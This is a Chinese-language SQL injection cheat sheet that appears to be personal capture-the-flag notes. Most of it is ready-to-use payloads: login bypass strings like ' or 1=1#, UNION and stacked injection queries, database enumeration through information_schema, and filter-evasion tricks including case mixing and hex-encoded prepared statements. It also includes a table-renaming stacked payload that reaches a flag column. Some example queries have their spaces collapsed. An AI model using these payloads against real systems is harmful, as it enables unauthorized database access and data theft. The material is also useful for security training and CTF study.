sql

UNION 先想办法结束上个语句，再用UNION拼接下一个语句 堆叠注入 同上，但用;拼接 WHERE 使其SELECT所有数据 注入： admin' – admin' # admin'/* ' or 1=1– ' or 1=1# ' or 1=1/* ‘) or ‘1’=‘1– ‘) or (‘1’=‘1– 以不同的用户登陆 ' UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– 报错注入

信息的获取 SELECT version() 数据库版本 user() 数据库用户名 database 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 其他 show columns from table_name;列信息 show databases;所有数据库名 show tables;所有表名 注入 1' order by 2 # 检查记录数量 字符串拼接 concat(str1,str2,…) 能够将你查询的字段连接在一起 concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起 group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator]) Example SELECTconcat(table_name,' ',column_name)FROMinformation_schema.COLUMNSWHERETABLE_SCHEMA=DATABASE();SELECTgroup_concat(table_name,column_nameseparator'_')FROMinformation_schema.COLUMNSWHERETABLE_SCHEMA=DATABASE();关键字被过滤 简单的有: 大小写混用(seLect,whEre…) SEL<>ECT(php) 空格 -> () = -> like 但是极其容易被堵,其他方法有以下 alter移花接木（堆叠注入） alter table (add/change/drop) selectdatafromwordswhereid='1';renametablewordstowords1;renametable`1919810931114514`towords;altertablewordsadd`id`intauto_incrementprimarykey;altertablewordschangeflagdatavarchar(100);#'; reference:https://ek1ng.com/notes.html#%E6%80%9D%E8%B7%AF%E4%B8%80 Hex绕开 hex编码sql语句再执行 select * from table_name =>73656c656374202a2066726f6d207461626c655f6e616d65 注入1';SeT@a=0x73656c656374202a2066726f6d207461626c655f6e616d65;prepare execsql from @a;execute execsql;%23...